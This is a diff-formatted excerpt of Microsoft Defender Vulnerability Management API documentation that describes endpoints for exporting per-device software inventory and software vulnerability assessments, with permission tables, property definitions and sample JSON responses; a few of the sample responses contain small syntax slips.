-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-DeviceId|string|Unique identifier for the device in the service.|9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
-DeviceName|string|Fully qualified domain name (FQDN) of the device.|johnlaptop.europe.contoso.com
-DiskPaths|Array[string]|Disk evidence that the product is installed on the device.|["C:\\Program Files (x86)\\Microsoft\\Silverlight\\Application\\silverlight.exe"]
-EndOfSupportDate|string|The date in which support for this software has or will end.|2020-12-30
-EndOfSupportStatus|string|End of support status. Can contain these possible values: None, EOS Version, Upcoming EOS Version, EOS Software, Upcoming EOS Software.|Upcoming EOS
-NumberOfWeaknesses|int|Number of weaknesses on this software on this device|3
-OSPlatform|string|Platform of the operating system running on the device. These are specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details.|Windows10 and Windows 11
-RbacGroupName|string|The role-based access control (RBAC) group. If this device is not assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."|Servers
-RegistryPaths|Array[string]|Registry evidence that the product is installed in the device.|["HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Silverlight"]
-SoftwareFirstSeenTimestamp|string|The first time this software was seen on the device.|2019-04-07 02:06:47
-SoftwareName|string|Name of the software product.|Silverlight
-SoftwareVendor|string|Name of the software vendor.|microsoft
-SoftwareVersion|string|Version number of the software product.|81.0.4044.138
-|
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?pageSize=5 &sinceTime=2021-05-19T18%3A35%3A49.924Z
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(contoso.windowsDefenderATP.api.AssetSoftware)",
- "value": [
- {
- "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": "windows_10" "Windows_11",
- "softwareVersion": "10.0.17763.1637",
- "numberOfWeaknesses": 58,
- "diskPaths": [],
- "registryPaths": [],
- "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
- "endOfSupportStatus": "Upcoming EOS Version",
- "endOfSupportDate": "2021-05-11T00:00:00+00:00"
- },
- {
- "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": ".net_framework",
- "softwareVersion": "4.0.0.0",
- "numberOfWeaknesses": 0,
- "diskPaths": [],
- "registryPaths": [
- "SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
- ],
- "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
- "endOfSupportStatus": "None",
- "endOfSupportDate": null
- },
- {
- "deviceId": "00044f68765bbaf712342dbe6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eed80d086e79bdfa178eadfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": "system_center_2012_endpoint_protection",
- "softwareVersion": "4.7.214.0",
- "numberOfWeaknesses": 0,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
- ],
- "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
- "endOfSupportStatus": "None",
- "endOfSupportDate": null
- },
- {
- "deviceId": "00044f68765ddaf71234bde6bd733d6a9c59ad4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18993b45912eeb224b2be2f5ea3142726e63f16a.DomainPII_21eeb80d086e79dbfa178aedfa25e8be9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": "configuration_manager",
- "softwareVersion": "5.0.8634.1000",
- "numberOfWeaknesses": 0,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{B7D3A842-E826-4542-B39B-1D883264B279}"
- ],
- "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
- "endOfSupportStatus": "None",
- "endOfSupportDate": null
- },
- {
- "deviceId": "00044f38765bbaf712342dbe6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18993b45912eeb224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8be9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "softwareVendor": "microsoft",
- "softwareName": "system_center_2012_endpoint_protection",
- "softwareVersion": "4.10.209.0",
- "numberOfWeaknesses": 0,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
- ],
- "softwareFirstSeenTimestamp": "2020-12-30 11:07:15",
- "endOfSupportStatus": "None",
- "endOfSupportDate": null
- }
- ],
- "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0yNS8wMjAwLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-```
-
-> [!NOTE]
-> The information returned by this API, along with the information returned by the [Export non product code software inventory assessment](get-assessment-non-cpe-software-inventory.md) API, for software that doesn't have a CPE, gives you full visibility into the software installed across your organization and the devices it's installed on.
-
-## 2. Export software inventory assessment (via files)
-
-### 2.1 API method description
-
-This API response contains all the data of installed software per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion.
-
-#### 2.1.1 Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Software.Read.All|\'Read Threat and Vulnerability Management software information\'
-Delegated (work or school account)|Software.Read|\'Read Threat and Vulnerability Management software information\'
-
-### 2.3 URL
-
-```http
-GET /api/machines/SoftwareInventoryExport
-```
-
-### Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours)-
-### 2.5 Properties
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline JSON format.
-> - The download URLs are only valid for 3 hours. Otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization|"[Https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
-GeneratedTime|string|The time that the export was generated.|2021-05-20T08:00:00Z
-|
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SoftwareInventoryExport
-```
-
-#### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/SoftwareInventory/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00394-e423630d-4c69-4490-8769-a4f5468c4f25.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A55%3A51Z&se=2021-01-11T14%3A55%3A51Z&sr=b&sp=r&sig=..."
- ],
- "generatedTime": "2021-01-11T11:01:00Z"
-}
-```
-
-## See also
--- [Export assessment methods and properties per device](get-assessment-methods-properties.md)-- [Export secure configuration assessment per device](get-assessment-secure-config.md)-- [Export software vulnerabilities assessment per device](get-assessment-software-vulnerabilities.md)-- [Export non product code software inventory assessment](get-assessment-non-cpe-software-inventory.md)-
-Other related
--- [Microsoft Defender Vulnerability Management](../next-gen-threat-and-vuln-mgt.md)-- [Vulnerabilities in your organization](../tvm-weaknesses.md)
security Get Assessment Software Vulnerabilities https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/get-assessment-software-vulnerabilities.md
- Title: Export software vulnerabilities assessment per device
-description: The API response is per device and contains vulnerable software installed on your exposed devices and any known vulnerabilities in these software products. This table also includes operating system information, CVE IDs, and vulnerability severity information.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/04/2021--
-# Export software vulnerabilities assessment per device
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Returns all known software vulnerabilities and their details for all devices, on a per-device basis.
-
-Different API calls get different types of data. Because the amount of data can be large, there are two ways it can be retrieved:
-
-1. [Export software vulnerabilities assessment **JSON response**](#1-export-software-vulnerabilities-assessment-json-response) The API pulls all data in your organization as Json responses. This method is best for _small organizations with less than 100-K devices_. The response is paginated, so you can use the \@odata.nextLink field from the response to fetch the next results.
-
-2. [Export software vulnerabilities assessment **via files**](#2-export-software-vulnerabilities-assessment-via-files) This API solution enables pulling larger amounts of data faster and more reliably. Via-files is recommended for large organizations, with more than 100-K devices. This API pulls all data in your organization as download files. The response contains URLs to download all the data from Azure Storage. This API enables you to download all your data from Azure Storage as follows:
- - Call the API to get a list of download URLs with all your organization data.
- - Download all the files using the download URLs and process the data as you like.
-
-3. [Delta export software vulnerabilities assessment **JSON response**](#3-delta-export-software-vulnerabilities-assessment-json-response) Returns a table with an entry for every unique combination of: DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, and EventTimestamp.
-The API pulls data in your organization as Json responses. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results.
-
- The full "software vulnerabilities assessment (JSON response)" is used to obtain an entire snapshot of the software vulnerabilities assessment of your organization by device. However, the delta export API call is used to fetch only the changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export JSON response API call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were added to my organization?"
-
- Because the Delta export JSON response API call for software vulnerabilities returns data for only a targeted date range, it isn't considered a _full export_.
-
-Data that is collected (using either _Json response_ or _via files_) is the current snapshot of the current state. It doesn't contain historic data. To collect historic data, customers must save the data in their own data storages.
-
-> [!NOTE]
-> Unless indicated otherwise, all export assessment methods listed are **_full export_** and **_by device_** (also referred to as **_per device_**).
-
-## 1. Export software vulnerabilities assessment (JSON response)
-
-### 1.1 API method description
-
-This API response contains all the data of installed software per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CVEID.
-
-#### 1.1.1 Limitations
--- Maximum page size is 200,000.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 1.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|Vulnerability.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-### 1.3 URL
-
-```http
-GET /api/machines/SoftwareVulnerabilitiesByMachine
-```
-
-### 1.4 Parameters
--- pageSize (default = 50,000): Number of results in response.-- $top: Number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).-
-### 1.5 Properties
-
-> [!NOTE]
->
-> - Each record is approximately 1 KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-
-<br>
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-CveId|String|Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.|CVE-2020-15992
-CvssScore|String|The CVSS score of the CVE.|6.2
-DeviceId|String|Unique identifier for the device in the service.|9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
-DeviceName|String|Fully qualified domain name (FQDN) of the device.|johnlaptop.europe.contoso.com
-DiskPaths|Array\[string\]|Disk evidence that the product is installed on the device.|["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
-ExploitabilityLevel|String|The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit)|ExploitIsInKit
-FirstSeenTimestamp|String|First time this product CVE was seen on the device.|2020-11-03 10:13:34.8476880
-Id|String|Unique identifier for the record.|123ABG55_573AG&mnp!
-LastSeenTimestamp|String|Last time the software vulnerability was seen on the device.|2020-11-03 10:13:34.8476880
-OSPlatform|String|Platform of the operating system running on the device. This property indicates specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details.|Windows10 and Windows 11
-RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."|Servers
-RecommendationReference|String|A reference to the recommendation ID related to this software.|va-_-microsoft-_-silverlight
-RecommendedSecurityUpdate (optional)|String|Name or description of the security update provided by the software vendor to address the vulnerability.|April 2020 Security Updates
-RecommendedSecurityUpdateId (optional)|String|Identifier of the applicable security updates or identifier for the corresponding guidance or knowledge base (KB) articles|4550961
-RegistryPaths|Array\[string\]|Registry evidence that the product is installed in the device.|["HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MicrosoftSilverlight"]
-SecurityUpdateAvailable|Boolean|Indicates whether a security update is available for the software.| Possible values are true or false.
-SoftwareName|String|Name of the software product.|Chrome
-SoftwareVendor|String|Name of the software vendor.|Google
-SoftwareVersion|String|Version number of the software product.|81.0.4044.138
-VulnerabilitySeverityLevel|String|Severity level assigned to the security vulnerability based on the CVSS score.|Medium
-|
-
-### 1.6 Examples
-
-#### 1.6.1 Request example
-
-```http
-GET https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?pageSize=5
-```
-
-#### 1.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.AssetVulnerability)",
- "value": [
- {
- "id": "00044f612345baf759462dbe6db733b6a9c59ab4_edge_10.0.17763.1637__",
- "deviceId": "00044f612345daf756462bde6bd733b9a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663b45912eed224b2de2f5ea3142726e63f16a.DomainPII_21eeb80d089e79bdfa178eabfa25e8de9acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "edge",
- "softwareVersion": "10.0.17763.1637",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [],
- "lastSeenTimestamp": "2020-12-30 14:17:26",
- "firstSeenTimestamp": "2020-12-30 11:07:15",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-edge",
- "securityUpdateAvailable": true
- },
- {
- "id": "00044f912345baf756462bde6db733b9a9c56ad4_.net_framework_4.0.0.0__",
- "deviceId": "00044f912345daf756462bde6db733b6a9c59ad4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eeb80b086e79bdfa178eabfa25e8de6acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": ".net_framework",
- "softwareVersion": "4.0.0.0",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [
- "SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4.0\\Client\\Install"
- ],
- "lastSeenTimestamp": "2020-12-30 13:18:33",
- "firstSeenTimestamp": "2020-12-30 11:07:15",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-.net_framework",
- "securityUpdateAvailable": true
- },
- {
- "id": "00044f912345baf756462dbe6db733d6a9c59ab4_system_center_2012_endpoint_protection_4.10.209.0__",
- "deviceId": "00044f912345daf756462bde6db733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663b45912eed224b2be2f5ea3142726e63f16a.DomainPII_21eed80b089e79bdfa178eadfa25e8be6acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "system_center_2012_endpoint_protection",
- "softwareVersion": "4.10.209.0",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft Security Client"
- ],
- "lastSeenTimestamp": "2020-12-30 14:17:26",
- "firstSeenTimestamp": "2020-12-30 11:07:15",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-system_center_2012_endpoint_protection",
- "securityUpdateAvailable": true
- },
- {
- "id": "00044f612345bdaf759462dbe6bd733b6a9c59ab4_onedrive_20.245.1206.2__",
- "deviceId": "00044f91234daf759492dbe6bd733b6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_189663d45612eed224b2be2f5ea3142729e63f16a.DomainPII_21eed80b086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "onedrive",
- "softwareVersion": "20.245.1206.2",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [
- "HKEY_USERS\\S-1-5-21-2944539346-1310925172-2349113062-1001\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\OneDriveSetup.exe"
- ],
- "lastSeenTimestamp": "2020-12-30 13:18:33",
- "firstSeenTimestamp": "2020-12-30 11:07:15",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-onedrive",
- "securityUpdateAvailable": true
- },
- {
- "id": "00044f912345daf759462bde6db733b6a9c56ab4_windows_10_10.0.17763.1637__",
- "deviceId": "00044f912345daf756462dbe6db733d6a9c59ab4",
- "rbacGroupName": "hhh",
- "deviceName": "ComputerPII_18663b45912eeb224d2be2f5ea3142729e63f16a.DomainPII_21eeb80d086e79bdfa178eadfa25e8de6acfa346.corp.contoso.com",
- "osPlatform": "Windows10" "Windows11",
- "osVersion": "10.0.17763.1637",
- "osArchitecture": "x64",
- "softwareVendor": "microsoft",
- "softwareName": "windows_10" "Windows_11",
- "softwareVersion": "10.0.17763.1637",
- "cveId": null,
- "vulnerabilitySeverityLevel": null,
- "recommendedSecurityUpdate": null,
- "recommendedSecurityUpdateId": null,
- "recommendedSecurityUpdateUrl": null,
- "diskPaths": [],
- "registryPaths": [],
- "lastSeenTimestamp": "2020-12-30 14:17:26",
- "firstSeenTimestamp": "2020-12-30 11:07:15",
- "exploitabilityLevel": "NoExploit",
- "recommendationReference": "va-_-microsoft-_-windows_10" "va-_-microsoft-_-windows_11",
- "securityUpdateAvailable": true
- }
- ],
- "@odata.nextLink": "https://api.securitycenter.microsoft.com/api/machines/SoftwareVulnerabilitiesByMachine?pagesize=5&$skiptoken=eyJFeHBvcnREZWZpbml0aW9uIjp7IlRpbWVQYXRoIjoiMjAyMS0wMS0xMS8xMTAxLyJ9LCJFeHBvcnRGaWxlSW5kZXgiOjAsIkxpbmVTdG9wcGVkQXQiOjV9"
-}
-```
-
-## 2. Export software vulnerabilities assessment (via files)
-
-### 2.1 API method description
-
-This API response contains all the data of installed software per device. Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CVEID.
-
-#### 2.1.2 Limitations
-
-Rate limitations for this API are 5 calls per minute and 20 calls per hour.
-
-### 2.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details](apis-intro.md).
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|\'Read Threat and Vulnerability Management vulnerability information\'
-Delegated (work or school account)|Vulnerability.Read|\'Read Threat and Vulnerability Management vulnerability information\'
-
-### 2.3 URL
-
-```http
-GET /api/machines/SoftwareVulnerabilitiesExport
-```
-
-### 2.4 Parameters
--- sasValidHours: The number of hours that the download URLs will be valid for (Maximum 24 hours).-
-### 2.5 Properties
-
-> [!NOTE]
->
-> - The files are gzip compressed & in multiline Json format.
-> - The download URLs are only valid for 3 hours; otherwise you can use the parameter.
-> - For maximum download speed of your data, you can make sure you are downloading from the same Azure region that your data resides.
->
-> - Each record is approximately 1KB of data. You should take this into account when choosing the correct pageSize parameter for you.
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, please use only the documented columns.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of a returned value
-:|:|:|:
-Export files|array\[string\]|A list of download URLs for files holding the current snapshot of the organization.|["https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...1", "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export...2"]
-GeneratedTime|String|The time that the export was generated.|2021-05-20T08:00:00Z
-|
-
-### 2.6 Examples
-
-#### 2.6.1 Request example
-
-```http
-GET https://api-us.securitycenter.contoso.com/api/machines/SoftwareVulnerabilitiesExport
-```
-
-#### 2.6.2 Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#microsoft.windowsDefenderATP.api.ExportFilesResponse",
- "exportFiles": [
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c000.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c001.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=...",
- "https://tvmexportstrstgeus.blob.core.windows.net/tvm-export/2021-01-11/1101/VaExport/json/OrgId=12345678-195f-4223-9c7a-99fb420fd000/part-00393-bcc26c4f-e531-48db-9892-c93ac5d72d5c.c002.json.gz?sv=2019-12-12&st=2021-01-11T11%3A35%3A13Z&se=2021-01-11T14%3A35%3A13Z&sr=b&sp=r&sig=..."
- ],
- "generatedTime": "2021-01-11T11:01:00Z"
-}
-```
-
-## 3. Delta export software vulnerabilities assessment (JSON response)
-
-### 3.1 API method description
-
-Returns a table with an entry for every unique combination of DeviceId, SoftwareVendor, SoftwareName, SoftwareVersion, CveId. The API pulls data in your organization as Json responses. The response is paginated, so you can use the @odata.nextLink field from the response to fetch the next results. Unlike the full software vulnerabilities assessment (JSON response) (which is used to obtain an entire snapshot of the software vulnerabilities assessment of your organization by device) the delta export JSON response API call is used to fetch only the changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export JSON response API call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed?" or "how many new vulnerabilities were added to my organization?"
-
-> [!NOTE]
-> It is highly recommended you use the full export software vulnerabilities assessment by device API call at least once a week, and this additional export software vulnerabilities changes by device (delta) API call all the other days of the week. Unlike the other Assessments JSON response APIs, the "delta export" is not a full export. The delta export includes only the changes that have happened between a selected date and the current date (the "delta" API call).
-
-#### 3.1.1 Limitations
--- Maximum page size is 200,000.-- The sinceTime parameter has a maximum of 14 days.-- Rate limitations for this API are 30 calls per minute and 1000 calls per hour.-
-### 3.2 Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs for details.](apis-intro.md)
-
-Permission type|Permission|Permission display name
-||
-Application|Vulnerability.Read.All|'Read Threat and Vulnerability Management vulnerability information'
-Delegated (work or school account)|Vulnerability.Read|'Read Threat and Vulnerability Management vulnerability information'
-
-### 3.3 URL
-
-```http
-GET /api/machines/SoftwareVulnerabilityChangesByMachine
-```
-
-### 3.4 Parameters
--- sinceTime (required): The start time from which you want to see data changes. Vulnerability management generates data on new and updated vulnerabilities every 6 hours. The data returned will include all the changes captured in the 6 hour period the specified sinceTime falls into, along with the changes in any subsequent 6 hour periods up to and including the most recently generated data.-- pageSize (default = 50,000): number of results in response.-- $top: number of results to return (doesn't return @odata.nextLink and so doesn't pull all the data).-
-### 3.5 Properties
-
-Each returned record contains all the data from the full export software vulnerabilities assessment by device API, plus two more fields: _**EventTimestamp**_ and _**Status**_.
-
-> [!NOTE]
->
-> - Some additional columns might be returned in the response. These columns are temporary and might be removed, so please use only the documented columns.
-> - The properties defined in the following table are listed alphabetically, by property ID. When running this API, the resulting output will not necessarily be returned in the same order listed in this table.
-
-<br>
-
-****
-
-Property (ID)|Data type|Description|Example of returned value
-:|:|:|:
-CveId |String|Unique identifier assigned to the security vulnerability under the Common Vulnerabilities and Exposures (CVE) system.|CVE-2020-15992
-CvssScore|String|The CVSS score of the CVE.|6.2
-DeviceId|String|Unique identifier for the device in the service.|9eaf3a8b5962e0e6b1af9ec756664a9b823df2d1
-DeviceName|String|Fully qualified domain name (FQDN) of the device.|johnlaptop.europe.contoso.com
-DiskPaths|Array[string]|Disk evidence that the product is installed on the device.|["C:\Program Files (x86)\Microsoft\Silverlight\Application\silverlight.exe"]
-EventTimestamp|String|The time this delta event was found.|2021-01-11T11:06:08.291Z
-ExploitabilityLevel|String|The exploitability level of this vulnerability (NoExploit, ExploitIsPublic, ExploitIsVerified, ExploitIsInKit)|ExploitIsInKit
-FirstSeenTimestamp|String|First time the CVE of this product was seen on the device.|2020-11-03 10:13:34.8476880
-Id|String|Unique identifier for the record.|123ABG55_573AG&mnp!
-LastSeenTimestamp|String|Last time the CVE was seen on the device.|2020-11-03 10:13:34.8476880
-OSPlatform|String|Platform of the operating system running on the device; specific operating systems with variations within the same family, such as Windows 10 and Windows 11. See Microsoft Defender Vulnerability Management supported operating systems and platforms for details.|Windows10 and Windows 11
-RbacGroupName|String|The role-based access control (RBAC) group. If this device isn't assigned to any RBAC group, the value will be "Unassigned." If the organization doesn't contain any RBAC groups, the value will be "None."|Servers
-RecommendationReference|string|A reference to the recommendation ID related to this software.|va--microsoft--silverlight
